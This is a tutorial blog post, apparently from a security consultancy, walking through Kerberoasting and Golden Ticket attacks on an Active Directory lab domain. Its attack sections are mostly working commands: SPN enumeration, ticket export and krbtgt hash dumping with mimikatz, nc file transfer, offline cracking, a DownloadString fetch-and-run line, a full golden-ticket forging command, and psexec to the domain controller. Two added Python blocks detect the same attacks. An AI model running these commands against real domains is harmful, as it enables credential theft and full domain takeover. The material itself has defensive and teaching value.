Understanding the Basics of Kerberoasting
Kerberoasting is one of the most common attacks against domain controllers. It is used to recover a service account password by cracking a Kerberos ticket (an encrypted blob) offline with brute-force techniques.
Any authenticated domain user can request Kerberos tickets from the TGS (ticket-granting service). A ticket for a service that runs under a domain user account is encrypted with the NTLM hash of that account's plaintext password, so the ticket can be taken offline and cracked.
Before moving on to the Golden Ticket exploit, let's walk through an example of Kerberoasting.
If you want, you can set up a Windows machine and join it to a specific domain, which eases communication between the external VM and the base machine; alternatively, take any HTB Windows machine and try the attack after gaining a user shell.
I would prefer the second option, as I don't have a heavy configuration.
In short, we crack the password offline, because part of the TGS ticket is encrypted with the password of the user account that runs the service.
Note that only user accounts with the “servicePrincipalName” attribute set are viable targets for Kerberoasting.
Earlier I said you could use an HTB machine, but don't rely on that: most of those machines don't have an SPN set, so I set up a machine of my own with an SPN configured by downloading Windows Server 12.
Search for the configured SPNs with the following commands.
To make enumeration and exploitation easier, download the PowerSploit tools.
Place the PowerView recon folder in the system32 folder, as that directory is already on the path.
Look for Get-NetUser; it reports whether an SPN is set on an account.
Start with basic enumeration and get the domain information:
Get-DomainComputer
Now that you have the domain information, collect information on the SPNs; the above command already gives you the domain name.
Run the following in PowerShell:
setspn -T dj.com -Q */*
Here you can see the user details; the account with the SPN set in the domain appears in the very last line.
We will request a service ticket for the service we wish to compromise. The domain controller retrieves the account's permissions from the Active Directory database and creates a TGS ticket, encrypting it with the service account's password.
As a result, only the service and the domain controller can decrypt the ticket, since they are the only two entities that share the secret.
The requested ticket is stored in memory, from where we will extract it and crack it.
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/dc-mantvydas.offense.local"
We now have to extract the Kerberos ticket from memory and export it to a file for Kerberoasting.
For this we need mimikatz on the Windows side; download the latest zip from GitHub.
Open a PowerShell session in the mimikatz folder that matches your Windows architecture (mine is x64, so go to that folder), start mimikatz and issue the command below.
kerberos::list /export
This dumps the tickets to files, which you can then transfer by drag and drop, or through nc or an HTTP server, as you wish.
If you have the cracking tools on Windows, that's all good; otherwise copy the “.kirbi” file to Kali, where the tools are already available or can easily be installed.
We copied the file to Kali.
Start an nc listener on Kali and send the file from Windows to Kali.
nc -lvnp 6666
nc 192.168.182.129 6666<$pathtothemimikatzdump***.dj.com.kirbi
Cracking the Kerberos Hashes
After transferring the file, crack the .kirbi file with a Python tool; I prefer tgsrepcrack.py, but there are plenty of other tools available, such as Hashcat and John.
Use the command below to crack it. How well the cracking goes depends on the wordlist you use; I made a custom wordlist by combining the ones already present.
This slowed things down a bit; when you don't know the password, it usually takes time.
python3 tgsrepcrack.py /usr/share/wordlists/wfuzz/general/common.txt ../1-40a50000-dosha@HTTP~dj.com-DJ.COM.kirbi
If you don't want to use the kirbi technique, you can use the Invoke-Kerberoast module from the Empire tool, which you can download with the command “iex (new-object Net.WebClient).DownloadString”.
Run Invoke-Kerberoast to dump the hash in the required format, then crack it using Hashcat.
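As a defender's counterpart to the attack walked through above, here is an added example (not from the original post) that flags the pattern Kerberoasting leaves in Windows Security event 4769 (service ticket requested) records: one account requesting RC4-encrypted service tickets for many SPN accounts in a short time. The records, the detection window and the threshold are constructed assumptions.

```python
"""Added example (not from the original post): flag Kerberoasting-style
behaviour in Windows Security event 4769 (service ticket requested) records.
Kerberoasting shows up as one account requesting RC4-HMAC (etype 0x17)
service tickets for many different SPN accounts in a short window.
The records, window and threshold below are constructed assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"              # etype 23: key derived from the NTLM hash this post cracks
WINDOW = timedelta(minutes=5)  # assumed detection window
SPN_THRESHOLD = 3              # assumed: distinct services per window before alerting

# Constructed 4769 records: (time, requesting account, target service, etype).
EVENTS = [
    ("2024-01-05 09:00:01", "dosha@DJ.COM", "http-svc", "0x17"),
    ("2024-01-05 09:00:02", "dosha@DJ.COM", "sql-svc", "0x17"),
    ("2024-01-05 09:00:03", "dosha@DJ.COM", "backup-svc", "0x17"),
    ("2024-01-05 09:00:04", "dosha@DJ.COM", "krbtgt", "0x12"),       # TGT renewal, benign
    ("2024-01-05 09:10:00", "alice@DJ.COM", "fileshare$", "0x12"),   # AES ticket, benign
    ("2024-01-05 11:30:00", "bob@DJ.COM", "http-svc", "0x17"),       # single legacy request
]

def kerberoast_suspects(events, window=WINDOW, threshold=SPN_THRESHOLD):
    """Return {account: sorted services} for accounts that requested RC4
    service tickets for at least `threshold` distinct services within `window`."""
    per_account = defaultdict(list)
    for ts, account, service, etype in events:
        # Only RC4 service tickets matter; krbtgt (TGT) requests are not roastable.
        if etype != RC4_HMAC or service.lower() == "krbtgt":
            continue
        per_account[account].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), service))
    suspects = {}
    for account, reqs in per_account.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            # Sliding window: distinct services requested within `window` of this request.
            seen = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(seen) >= threshold:
                suspects[account] = sorted(seen)
                break
    return suspects

if __name__ == "__main__":
    for account, services in kerberoast_suspects(EVENTS).items():
        print(f"possible Kerberoasting by {account}: {', '.join(services)}")
```

A single RC4 request from a legacy client (bob above) stays below the threshold; tune the window and threshold to the domain's normal service-ticket volume.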
Golden Ticket
A Golden Ticket attack lets an attacker forge a Kerberos authentication ticket using the key of a compromised service account, krbtgt, with the help of Mimikatz.
This requires an account with admin rights that is already authenticated; we have that from the user exploited above.
Normally a user must be authenticated before performing any action, since every request for a service or a ticket from the domain checks whether the user is authenticated.
By compromising the KRBTGT account, the attacker can forge tickets that are already encrypted with the valid krbtgt hash.
This attack assumes a Domain Controller compromise, from which the KRBTGT account hash is extracted; that hash is a requirement for a successful Golden Ticket attack.
Extract the krbtgt account NTLM hash using mimikatz.
Mimikatz is already installed, so just use the commands below. To create a forged TGT we first need the domain name, the domain SID and the KRBTGT hash.
mimikatz # privilege::debug
mimikatz # lsadump::lsa /inject /name:krbtgt
(You can provide a different account name.)
Now use mimikatz to pass the forged ticket and obtain a cmd session. Essentially we are presenting the forged TGT to the KDC to get a TGS, which for the time being connects you to the session.
kerberos::golden /user:cursed /domain:DJ.COM /sid:S-1-5-21-1658281939-3107778392-223560393 /krbtgt:8b6da8753625a156ddda6272b9ce8cb4 /id:500 /ptt
misc::cmd
To confirm, use the klist command in mimikatz; it shows the client user you just created.
After this, you can mount the c$ share of the domain controller using the computer name you acquired earlier, with the command below, and you will gain access to the drive.
pushd \\WIN-6E7EBF87UMR.dj.com\c$
ls
OR
Alternatively, use the earlier approach, where misc::cmd opened a cmd connected to the domain controller; you can download PsExec.exe to connect over the network and gain shell access.
psexec.exe \\169.254.164.158 cmd.exe
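As an added detection-side example (not from the original post), the following parses klist output like that used above to confirm the forged ticket and flags TGTs whose lifetime exceeds the domain default or whose client account is not in the directory; the klist text, the user list and the policy values are constructed assumptions.

```python
"""Added example (not from the original post): check klist output for signs of
a forged (golden) TGT. kerberos::golden defaults to a ten-year ticket lifetime
and may name a client that does not exist in the directory; both stand out against
the normal TGT lifetime (10 hours by default) and the real user list (constructed)."""
import re
from datetime import datetime, timedelta

MAX_TGT_LIFETIME = timedelta(hours=10)            # assumed domain policy default
KNOWN_USERS = {"dosha", "alice", "administrator"}  # constructed directory export

# Constructed klist output after kerberos::golden ... /user:cursed /ptt.
KLIST_OUTPUT = """
#0>     Client: cursed @ DJ.COM
        Server: krbtgt/DJ.COM @ DJ.COM
        Start Time: 1/5/2024 9:00:00 (local)
        End Time:   1/3/2034 9:00:00 (local)

#1>     Client: dosha @ DJ.COM
        Server: HTTP/dj.com @ DJ.COM
        Start Time: 1/5/2024 9:05:00 (local)
        End Time:   1/5/2024 19:05:00 (local)
"""

TICKET_RE = re.compile(
    r"Client:\s*(?P<client>\S+) @ \S+.*?Server:\s*(?P<server>\S+) @.*?"
    r"Start Time:\s*(?P<start>\S+ \S+).*?End Time:\s*(?P<end>\S+ \S+)", re.S)

def parse_klist(text):
    """Yield one dict per ticket with client, server and parsed start/end times."""
    for m in TICKET_RE.finditer(text):
        t = m.groupdict()
        t["start"] = datetime.strptime(t["start"], "%m/%d/%Y %H:%M:%S")
        t["end"] = datetime.strptime(t["end"], "%m/%d/%Y %H:%M:%S")
        yield t

def golden_ticket_findings(text, known_users=KNOWN_USERS, max_life=MAX_TGT_LIFETIME):
    """Return {client: [reasons]} for TGTs (krbtgt/ server) that look forged."""
    findings = {}
    for t in parse_klist(text):
        if not t["server"].lower().startswith("krbtgt/"):
            continue  # only TGTs are golden-ticket candidates
        reasons = []
        if t["end"] - t["start"] > max_life:
            reasons.append(f"lifetime of {(t['end'] - t['start']).days} days exceeds policy")
        if t["client"].lower() not in known_users:
            reasons.append("client account not present in the directory")
        if reasons:
            findings[t["client"]] = reasons
    return findings
```

The same two checks apply to event 4768/4769 records on the domain controller, where a forged TGT is used by an account name the directory does not know.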
This is only one type of attack; there are many more ways. For more on Kerberoasting and Golden Ticket exploitation, refer to https://www.hackingarticles.in/domain-persistence-golden-ticket-attack/
References
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets
- https://www.hackingarticles.in/domain-persistence-golden-ticket-attack/
- https://adsecurity.org/?page_id=1821
- https://github.com/PowerShellEmpire/PowerTools
- https://book.hacktricks.xyz/windows/active-directory-methodology/kerberos-authentication
- https://github.com/davehardy20/sysinternals
About Payatu
Payatu is a research-focused, CERT-In empanelled cybersecurity consulting company specializing in security assessments of IoT product ecosystems, web applications and networks, with a proven track record of securing applications and infrastructure for customers across 20+ countries.